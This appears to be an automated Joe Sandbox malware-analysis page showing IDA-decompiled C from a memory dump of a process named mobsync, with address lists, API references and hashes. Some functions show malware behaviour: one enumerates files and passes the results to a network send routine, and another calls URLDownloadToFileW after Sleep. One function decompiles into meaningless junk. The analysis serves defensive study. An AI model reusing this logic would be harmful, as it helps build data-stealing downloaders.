0x0043eb4b
0x0043eb4c
0x0043eb4e
0x0043eb50
0x0043eb52
0x0043eb55
0x0043eb60
0x0043eb60
0x0043eb66
0x0043eb66
0x0043eb69
0x0043eb6a
0x0043eb6a
0x0043eb60
0x0043eb6e
0x0043eb70
0x0043eb72
0x0043eb74
0x0043eb74
0x0043eb76
0x0043eb7a
0x00000000
0x00000000
0x0043eb7c
0x0043eb7c
0x0043eb7f
0x0043eb81
0x00000000
0x00000000
0x00000000
0x0043eb81
0x0043eb74
0x0043eb83
0x0043eb8d
0x00000000
0x00000000
0x00000000
0x0043e898
0x0043e722
0x0043e722
0x0043e722
0x0043e725
0x0043e728
0x0043e72b
0x0043e75c
0x0043e75e
0x0043e7a9
0x0043e7ab
0x0043e7b2
0x0043e7b9
0x0043e7bc
0x0043e7bf
0x0043e7c5
0x0043e7c5
0x0043e7c6
0x0043e7c9
0x0043e7d0
0x0043e7d9
0x0043e7de
0x0043e7e1
0x0043e7e6
0x0043e7e9
0x0043e7eb
0x0043e7f0
0x0043e7f3
0x0043e7f6
0x0043e7f6
0x0043e7f6
0x0043e7fa
0x0043e7fd
0x0043e7fd
0x0043e802
0x0043e802
0x0043e80d
0x0043e818
0x0043e818
0x0043e81b
0x0043e827
0x0043e82c
0x0043e837
0x0043e839
0x0043e83b
0x0043e841
0x0043e846
0x0043e848
0x0043e84e
0x0043e760
0x0043e76c
0x0043e76c
0x0043e76f
0x0043e77f
0x0043e785
0x0043e78c
0x0043e78e
0x0043e796
0x0043e798
0x0043e79a
0x0043e79f
0x0043e7a2
0x0043e7a8
0x0043e7a8
0x0043e72d
0x0043e730
0x0043e734
0x0043e73a
0x0043e749
0x0043e753
0x0043e75b
0x0043e75b
0x0043e72b
0x0043e706
0x0043e709
0x0043e70f
0x0043e70f
0x0043e6f5
0x0043e6fb
0x0043e6fb

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14bbaf67019870a331f4b5b45068d93c8c80d320c053cc2b70984b6853b2a72a
Instruction ID: c9095bced287452c1fdcefa15132fa2ac08618c89a92f7659608ff5a5b4c1b47
Opcode Fuzzy Hash: 14bbaf67019870a331f4b5b45068d93c8c80d320c053cc2b70984b6853b2a72a
Instruction Fuzzy Hash: 2D022D71E012199BDF14DFAAC8806AEFBF1FF88314F25816AD919E7380D734AD418B94

Uniqueness

Uniqueness Score: -1.00%

Function 00406176, Relevance: 3.1, APIs: 2, Instructions: 86
fileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00406176(char _a4) {
				char _v28;
				char _v52;
				char _v76;
				struct _WIN32_FIND_DATAW _v668;
				void* __ebx;
				void* __esi;
				int _t29;
				void* _t34;
				void* _t49;
				void* _t73;
				void* _t74;

				_t73 = FindFirstFileW(L00401ECB( &_a4),  &_v668);
				_t77 = _t73 - 0xffffffff;
				if(_t73 != 0xffffffff) {
					E004020B5(_t49,  &_v28);
					E0040425F(_t49,  &_v52,  &(_v668.cFileName));
					_t71 = ".";
					_t29 = E004074E6(__eflags);
					_t50 = _t29;
					L00401ED0();
					__eflags = _t29;
					if(__eflags != 0) {
						L00401FB1( &_v28, ".", _t73, E0040208B(_t50,  &_v52, ".", __eflags,  &_v668, 0x250));
						L5:
						L00401FA7();
					}
					__eflags = FindNextFileW(_t73,  &_v668);
					if(__eflags != 0) {
						_t34 = E0040208B(_t50,  &_v76, _t71, __eflags,  &_v668, 0x250);
						_t71 =  &_v28;
						L00401FB1( &_v28,  &_v28, _t73, E004074F2(_t50,  &_v52,  &_v28, __eflags, _t34));
						L00401FA7();
						goto L5;
					}
					E004020CC(_t50, _t74 - 0x18, _t71, __eflags,  &_v28);
					_push(0x50);
					E00404A6E(_t50, 0x46c2e8, _t71, __eflags);
					L00401FA7();
				} else {
					L00416CF4(_t49, _t74 - 0x18,  &_a4);
					_push(0x54);
					E00404A6E(_t49, 0x46c2e8,  &_a4, _t77);
				}
				return L00401ED0();
			}

0x00406197
0x00406199
0x0040619c
0x004061bf
0x004061ce
0x004061d3
0x004061da
0x004061e2
0x004061e4
0x004061e9
0x004061eb
0x00406205
0x00406244
0x00406244
0x00406244
0x00406257
0x00406259
0x0040621e
0x00406224
0x00406234
0x0040623c
0x00000000
0x00406241
0x00406264
0x00406269
0x00406270
0x00406278
0x0040619e
0x004061a6
0x004061ab
0x004061b2
0x004061b2
0x0040628a

APIs

FindFirstFileW.KERNEL32(00000000,?,?,0046C238), ref: 00406191
FindNextFileW.KERNEL32(00000000,?,?), ref: 00406251

Part of subcall function 00404A6E: send.WS2_32 ref: 00404AE2

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNextsend
String ID:
API String ID: 4113138495-0
Opcode ID: fbf5e75e81723d9cb7be74d35e6845a1c8731f1aa46ca83b8c529592b2649c33
Instruction ID: da5cdc510f7b1e2dc041b682181fa273f481cbbb57d68fa438c846ee03cac76e
Opcode Fuzzy Hash: fbf5e75e81723d9cb7be74d35e6845a1c8731f1aa46ca83b8c529592b2649c33
Instruction Fuzzy Hash: CD2141719101195ACB14FBA5CC96DEEB738AF51304F40027FF906761D1EF385A498A99

Uniqueness

Uniqueness Score: -1.00%

Function 0041242F, Relevance: 3.1, APIs: 2, Instructions: 66
sleepfilenetworkCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0041242F(signed int __eax, intOrPtr* __ebx, void* __ecx, intOrPtr* __edi) {
				void* _t40;
				signed char _t41;
				signed int _t42;
				signed int _t43;
				signed char _t45;
				signed int _t47;
				signed char _t48;
				signed char _t50;
				signed char _t51;
				void* _t57;
				signed char _t60;
				void* _t69;
				intOrPtr* _t71;
				void* _t72;
				intOrPtr* _t74;
				void* _t75;
				signed int* _t76;
				signed int* _t77;
				signed int* _t78;
				signed int* _t79;
				signed int* _t80;
				signed int* _t81;
				signed int* _t82;
				signed int* _t86;
				signed int* _t87;
				intOrPtr* _t90;
				void* _t91;
				signed int _t92;
				intOrPtr* _t95;
				intOrPtr* _t96;
				signed int _t99;
				signed char _t100;
				intOrPtr* _t102;
				intOrPtr* _t103;
				signed int _t104;
				void* _t106;

				_t102 = __edi;
				 *__eax =  *__eax | __eax;
				_t40 = __eax + __ecx;
				E0040B107();
				asm("adc bl, [esi]");
				_t74 = __ecx + 1;
				 *((intOrPtr*)(_t40 - 0x12ffbee1)) =  *((intOrPtr*)(_t40 - 0x12ffbee1)) + __ebx;
				 *_t74 =  *_t74 - _t40;
				asm("popad");
				_t41 = _t40 - 0x2d610041;
				_t75 = _t74 + 1;
				 *((intOrPtr*)(_t75 - 0x1affbee1)) =  *((intOrPtr*)(_t75 - 0x1affbee1)) + _t41;
				_pop(ds);
				_t76 = _t75 + 1;
				 *((intOrPtr*)(_t41 + 0xa004120)) =  *((intOrPtr*)(_t41 + 0xa004120)) + _t76;
				 *_t76 =  *_t76 & _t41;
				asm("das");
				 *_t76 =  *_t76 & _t41;
				 *_t76 =  *_t76 & _t41;
				_t99 = _t103;
				 *_t76 =  *_t76 & _t41;
				_t42 = _t99;
				_t100 = _t41;
				 *_t76 =  *_t76 & _t42;
				asm("in al, dx");
				 *_t76 =  *_t76 & _t42;
				 *[cs:ecx] =  *[cs:ecx] & _t42;
				_push(__edi);
				 *_t76 =  *_t76 & _t42;
				asm("aam 0x21");
				_t77 =  &(_t76[0]);
				_t43 = _t42 + _t42;
				 *_t77 =  *_t77 & _t43;
				_t45 = _t43 + 0x14004122 &  *_t77;
				_t78 =  &(_t77[0]);
				 *((intOrPtr*)(_t45 + 0x22)) =  *((intOrPtr*)(_t45 + 0x22)) + _t78;
				_t79 =  &(_t78[0]);
				_t79[8] = _t79[8] + __ebx;
				_t80 =  &(_t79[0]);
				 *__edi =  *__edi + _t100;
				 *_t80 =  *_t80 - _t45;
				asm("popad");
				_t81 =  &(_t80[0]);
				 *((intOrPtr*)(_t81 - 0xffbede)) =  *((intOrPtr*)(_t81 - 0xffbede)) + _t81;
				_t47 = _t45 - 0x2d610041 &  *_t81;
				asm("adc al, 0x23");
				_t82 =  &(_t81[0]);
				 *((intOrPtr*)(_t47 - 0x4bffbedd)) =  *((intOrPtr*)(_t47 - 0x4bffbedd)) + _t100;
				_t48 = _t47 &  *_t82;
				asm("repe and eax, [ecx]");
				asm("adc [ecx+eax*2], esp");
				 *_t103 =  *_t103 + _t48;
				 *__ebx =  *__ebx + _t100;
				_t50 = _t48 & 0x41;
				 *((intOrPtr*)(_t106 + 0x24)) =  *((intOrPtr*)(_t106 + 0x24)) + _t50;
				_t71 = __ebx + _t100;
				_t51 = _t50 & 0x00000041;
				 *((intOrPtr*)(_t103 + 0x25)) =  *((intOrPtr*)(_t103 + 0x25)) + _t51;
				 *((intOrPtr*)(_t51 + 0x3f004125)) =  *((intOrPtr*)(_t51 + 0x3f004125)) + _t71;
				asm("daa");
				 *((intOrPtr*)(_t106 + 0x24004126)) =  *((intOrPtr*)(_t106 + 0x24004126)) + _t51;
				asm("daa");
				_t86 =  &(_t82[1]);
				 *((intOrPtr*)(_t86 - 0x40ffbed9)) =  *((intOrPtr*)(_t86 - 0x40ffbed9)) + _t51;
				asm("daa");
				_t87 =  &(_t86[0]);
				 *_t71 =  *_t71 + _t87;
				 *_t87 =  *_t87 - _t51;
				asm("adc eax, 0x35004128");
				 *_t87 =  *_t87 - _t51;
				_push(_t106);
				 *_t87 =  *_t87 - _t51;
				if( *_t87 == 0) {
					_t95 =  &(_t87[0]) +  &(_t87[0]);
					 *_t95 =  *_t95 - _t51;
					asm("popad");
					_t96 = _t95 + 1;
					 *((intOrPtr*)(_t100 - 0x50ffbed6)) =  *((intOrPtr*)(_t100 - 0x50ffbed6)) + _t96;
					asm("scasd");
					asm("daa");
					_t69 = _t51 - 0x29170041 -  *_t96 -  *_t96 - 0x41;
					 *((intOrPtr*)(__edi + 0x2c)) =  *((intOrPtr*)(__edi + 0x2c)) + _t69;
					 *((intOrPtr*)(__edi + 0x2a)) =  *((intOrPtr*)(__edi + 0x2a)) + _t69;
					_t87 = _t96 + 2;
					_t71 = _t71 + _t69;
					_t51 = _t69 -  *_t87;
				}
				 *_t102 =  *_t102 + _t51;
				_t72 = _t71 + _t71;
				 *((intOrPtr*)(_t103 + 0x6700412c)) =  *((intOrPtr*)(_t103 + 0x6700412c)) + _t72;
				_t57 = _t51 + _t100 - 0xffffffffffffffbf;
				 *_t100 =  *_t100 + _t57;
				_t90 =  &(_t87[0]) +  &(_t87[0]) + 1;
				 *((intOrPtr*)(_t102 - 0x59ffbed5)) =  *((intOrPtr*)(_t102 - 0x59ffbed5)) + _t72;
				_t60 = _t57 - 0x2c710041 -  *_t90 ^ 0x0000002b;
				_t91 = _t90 + 1;
				 *((intOrPtr*)(_t91 + 0x2d)) =  *((intOrPtr*)(_t91 + 0x2d)) + _t60;
				_t92 = _t91 + 1;
				 *_t60 =  *_t60 + _t60;
				asm("adc al, [ecx]");
				asm("adc al, [edx]");
				es = es;
				asm("adc dl, [edx]");
				asm("adc cl, [eax]");
				 *(_t100 +  *_t100) =  *(_t100 +  *_t100) | _t92;
				asm("adc cl, [ebx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc [esi-0x75], edx");
				_push(_t103);
				_t104 = _t92;
				E00404818(_t72, _t104 + 4, 0);
				return _t104;
			}

0x0041242f
0x00412430
0x00412432
0x00412d8d
0x00412d94
0x00412d96
0x00412d97
0x00412d9d
0x00412da0
0x00412da1
0x00412da6
0x00412da7
0x00412dad
0x00412dae
0x00412daf
0x00412db5
0x00412db8
0x00412db9
0x00412dbd
0x00412dc0
0x00412dc1
0x00412dc4
0x00412dc4
0x00412dc5
0x00412dc8
0x00412dc9
0x00412dcc
0x00412dd0
0x00412dd1
0x00412dd4
0x00412dd6
0x00412dd7
0x00412dd9
0x00412de1
0x00412de6
0x00412de7
0x00412dea
0x00412deb
0x00412dee
0x00412def
0x00412df1
0x00412df4
0x00412dfa
0x00412dfb
0x00412e01
0x00412e04
0x00412e06
0x00412e07
0x00412e0d
0x00412e10
0x00412e14
0x00412e17
0x00412e1b
0x00412e1d
0x00412e1f
0x00412e23
0x00412e25
0x00412e27
0x00412e2b
0x00412e31
0x00412e33
0x00412e39
0x00412e3a
0x00412e3b
0x00412e41
0x00412e42
0x00412e43
0x00412e45
0x00412e48
0x00412e4d
0x00412e50
0x00412e51
0x00412e54
0x00412e57
0x00412e59
0x00412e5c
0x00412e62
0x00412e63
0x00412e6c
0x00412e70
0x00412e71
0x00412e73
0x00412e77
0x00412e7a
0x00412e7b
0x00412e7d
0x00412e7d
0x00412e7f
0x00412e8b
0x00412e8f
0x00412e95
0x00412e97
0x00412e9e
0x00412e9f
0x00412ea8
0x00412eaa
0x00412eab
0x00412eae
0x00412eaf
0x00412eb1
0x00412eb3
0x00412eba
0x00412ebb
0x00412ebd
0x00412ebf
0x00412ec1
0x00412ec5
0x00412ec7
0x00412ec9
0x00412ed0
0x00412ed2
0x00412ed3
0x00412ed4
0x00412edb
0x00412ee3

APIs

Sleep.KERNEL32 ref: 0041243F
URLDownloadToFileW.URLMON ref: 004124A1

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: DownloadFileSleep
String ID:
API String ID: 1931167962-0
Opcode ID: 7f03ed4a55e1d2d9b7ee2836a4673c43d9de2cb06a7435c473ec7b240289604c
Instruction ID: 3a50cae3c82b3ce372d535e7f9d3fad8a6779efd93a680446f7f936b56fe5819
Opcode Fuzzy Hash: 7f03ed4a55e1d2d9b7ee2836a4673c43d9de2cb06a7435c473ec7b240289604c
Instruction Fuzzy Hash: CA1175715083019BC714FF72D8569AE73A4AF50308F40087FF842961E2EF7C9949C65A

Uniqueness

Uniqueness Score: -1.00%

Function 0044A725, Relevance: 1.8, APIs: 1, Instructions: 269
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E0044A725(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = L0044AD58(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							L0044ACBE(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x0044a733
0x0044a73a
0x0044a73f
0x0044a745
0x0044a748
0x0044a74e
0x0044a753
0x0044a758
0x0044a758
0x0044a75e
0x0044a763
0x0044a768
0x0044a768
0x0044a76f
0x0044a774
0x0044a779
0x0044a779
0x0044a780
0x0044a785
0x0044a78a
0x0044a78a
0x0044a791
0x0044a796
0x0044a79b
0x0044a79b
0x0044a7a3
0x0044a7b3
0x0044a7c5
0x0044a7d7
0x0044a7ea
0x0044a7fc
0x0044a804
0x0044a809
0x0044a80e
0x0044a80e
0x0044a815
0x0044a81a
0x0044a81a
0x0044a821
0x0044a826
0x0044a826
0x0044a82d
0x0044a832
0x0044a832
0x0044a839
0x0044a83e
0x0044a83e
0x0044a848
0x0044a84a
0x0044a884
0x0044a84c
0x0044a851
0x0044a875
0x0044a87d
0x0044a871
0x0044a871
0x0044a887
0x0044a88e
0x0044a890
0x0044a8b2
0x0044a8ba
0x0044a8bd
0x0044a8bd
0x0044a8bf
0x0044a8bf
0x0044a8ca
0x0044a8d0
0x0044a8d5
0x0044a8dc
0x0044a916
0x0044a921
0x0044a927
0x0044a92a
0x0044a92d
0x0044a939
0x0044a941
0x0044a8de
0x0044a8e1
0x0044a8ed
0x0044a8f3
0x0044a8f9
0x0044a8fc
0x0044a905
0x0044a905
0x0044a944
0x0044a952
0x0044a958
0x0044a95f
0x0044a961
0x0044a961
0x0044a968
0x0044a96a
0x0044a96a
0x0044a971
0x0044a973
0x0044a973
0x0044a97a
0x0044a97c
0x0044a97c
0x0044a983
0x0044a985
0x0044a985
0x0044a992
0x0044a995
0x0044a9cc
0x0044a997
0x0044a997
0x0044a99a
0x0044a9c5
0x0044a9ba
0x0044a9ba
0x0044a9ce
0x0044a9d6
0x0044a9d9
0x0044a9f8
0x0044a9fd
0x0044a9fd
0x0044a9ff
0x0044aa04
0x0044aa10
0x0044aa06
0x0044aa09
0x0044aa09
0x0044aa15
0x0044aa15
0x0044a9db
0x0044a9de
0x0044a9ed
0x00000000
0x0044a9ed
0x0044a9e0
0x0044a9e3
0x0044a9e5
0x0044a9e5
0x00000000
0x0044a9e3
0x0044a99c
0x0044a99f
0x0044a9b5
0x00000000
0x0044a9b5
0x0044a9a4
0x0044a9a6
0x0044a9a6
0x0044a9a4
0x00000000
0x0044a995
0x0044a897
0x0044a8a5
0x0044a8ad
0x00000000
0x0044a8ad
0x0044a89b
0x0044a8a0
0x0044a8a0
0x00000000
0x0044a89b
0x0044a858
0x0044a866
0x0044a86e
0x00000000
0x0044a86e
0x0044a85c
0x0044a861
0x0044a861
0x0044a85c

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0044A720,?,?,00000008,?,?,0044F5BD,00000000), ref: 0044A952

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: ee5c82292e4cb9bebcf2c480891f5012e17214ea8a28f852caf1b2c26ae8abec
Instruction ID: ef8f2bfcaa11f5be52c886be828ac796cff9f19ab01b40af8a5749b2f814247f
Opcode Fuzzy Hash: ee5c82292e4cb9bebcf2c480891f5012e17214ea8a28f852caf1b2c26ae8abec
Instruction Fuzzy Hash: FEB18F71550608DFE719CF28C486B657BE0FF04364F298659E899CF3A2C339D9A2CB46

Uniqueness

Uniqueness Score: -1.00%

Function 0042F2AB, Relevance: 1.6, APIs: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0042F2AB(intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _t51;
				signed int _t53;
				signed int _t56;
				signed int _t57;
				intOrPtr _t59;
				signed int _t60;
				signed int _t62;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr* _t70;
				intOrPtr _t76;
				intOrPtr _t81;
				intOrPtr* _t83;
				signed int _t84;
				signed int _t87;

				_t81 = __edx;
				 *0x46ad0c =  *0x46ad0c & 0x00000000;
				 *0x46a010 =  *0x46a010 | 1;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L20:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				 *0x46a010 =  *0x46a010 | 0x00000002;
				 *0x46ad0c = 1;
				_t83 =  &_v44;
				_push(1);
				asm("cpuid");
				_pop(_t67);
				 *_t83 = 0;
				 *((intOrPtr*)(_t83 + 4)) = 1;
				 *((intOrPtr*)(_t83 + 8)) = 0;
				 *((intOrPtr*)(_t83 + 0xc)) = _t81;
				_v12 = _v44;
				_t51 = 1;
				_t76 = 0;
				_push(1);
				asm("cpuid");
				_pop(_t68);
				 *_t83 = _t51;
				 *((intOrPtr*)(_t83 + 4)) = _t67;
				 *((intOrPtr*)(_t83 + 8)) = _t76;
				 *((intOrPtr*)(_t83 + 0xc)) = _t81;
				if((_v32 ^ 0x49656e69 | _v36 ^ 0x6c65746e | _v40 ^ 0x756e6547) != 0) {
					L9:
					_t84 =  *0x46ad10; // 0x2
					L10:
					_v28 = _v32;
					_t53 = _v36;
					_v8 = _t53;
					_v24 = _t53;
					if(_v12 >= 7) {
						_t59 = 7;
						_push(_t68);
						asm("cpuid");
						_t70 =  &_v44;
						 *_t70 = _t59;
						 *((intOrPtr*)(_t70 + 4)) = _t68;
						 *((intOrPtr*)(_t70 + 8)) = 0;
						 *((intOrPtr*)(_t70 + 0xc)) = _t81;
						_t60 = _v40;
						_v20 = _t60;
						_t53 = _v8;
						if((_t60 & 0x00000200) != 0) {
							 *0x46ad10 = _t84 | 0x00000002;
						}
					}
					if((_t53 & 0x00100000) != 0) {
						 *0x46a010 =  *0x46a010 | 0x00000004;
						 *0x46ad0c = 2;
						if((_t53 & 0x08000000) != 0 && (_t53 & 0x10000000) != 0) {
							asm("xgetbv");
							_v16 = _t53;
							_v12 = _t81;
							if((_v16 & 0x00000006) == 6 && 0 == 0) {
								_t56 =  *0x46a010; // 0x2f
								_t57 = _t56 | 0x00000008;
								 *0x46ad0c = 3;
								 *0x46a010 = _t57;
								if((_v20 & 0x00000020) != 0) {
									 *0x46ad0c = 5;
									 *0x46a010 = _t57 | 0x00000020;
								}
							}
						}
					}
					goto L20;
				}
				_t62 = _v44 & 0x0fff3ff0;
				if(_t62 == 0x106c0 || _t62 == 0x20660 || _t62 == 0x20670 || _t62 == 0x30650 || _t62 == 0x30660 || _t62 == 0x30670) {
					_t87 =  *0x46ad10; // 0x2
					_t84 = _t87 | 0x00000001;
					 *0x46ad10 = _t84;
					goto L10;
				} else {
					goto L9;
				}
			}

0x0042f2ab
0x0042f2ae
0x0042f2bc
0x0042f2cb
0x0042f43e
0x0042f444
0x0042f444
0x0042f2d1
0x0042f2d7
0x0042f2e2
0x0042f2e8
0x0042f2eb
0x0042f2ec
0x0042f2f0
0x0042f2f1
0x0042f2f3
0x0042f2f6
0x0042f2f9
0x0042f302
0x0042f321
0x0042f324
0x0042f325
0x0042f326
0x0042f32a
0x0042f32b
0x0042f32d
0x0042f330
0x0042f333
0x0042f336
0x0042f37b
0x0042f37b
0x0042f381
0x0042f388
0x0042f38b
0x0042f38e
0x0042f391
0x0042f394
0x0042f398
0x0042f39b
0x0042f39c
0x0042f3a1
0x0042f3a4
0x0042f3a6
0x0042f3a9
0x0042f3ac
0x0042f3af
0x0042f3b7
0x0042f3ba
0x0042f3bd
0x0042f3c2
0x0042f3c2
0x0042f3bd
0x0042f3cf
0x0042f3d1
0x0042f3d8
0x0042f3e7
0x0042f3f2
0x0042f3f5
0x0042f3f8
0x0042f409
0x0042f40f
0x0042f414
0x0042f417
0x0042f425
0x0042f42a
0x0042f42f
0x0042f439
0x0042f439
0x0042f42a
0x0042f409
0x0042f3e7
0x00000000
0x0042f3cf
0x0042f33b
0x0042f345
0x0042f36a
0x0042f370
0x0042f373
0x00000000
0x00000000
0x00000000
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 0042F2C4

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
